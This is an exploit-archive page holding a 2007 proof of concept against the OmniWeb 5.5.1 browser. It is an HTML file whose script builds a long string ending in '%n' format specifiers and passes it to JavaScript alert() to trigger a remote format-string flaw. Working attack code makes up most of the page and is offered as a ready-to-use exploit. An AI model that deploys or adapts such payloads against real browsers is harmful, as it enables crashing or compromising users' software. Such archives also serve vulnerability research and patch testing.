OmniWeb 5.5.1 Javascript alert() Remote Format String PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OmniWeb 5.5.1 Javascript alert() Remote Format String PoC
# Published : 2007-01-07
# Author : MoAB
# Previous Title : Opera <= 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities
# Next Title : Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-07-01-2007</title>
		<script>
			/* LMH */
			function boom() {
				var str = 'A';
				while (str.length <= 32) str+=str;
				str = str + '%n%n%n%n%n%n';
				alert(str);
			}
		</script>
	</head>
	<body>
		<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
	</body>

</html>

# www.Syue.com [2007-01-07]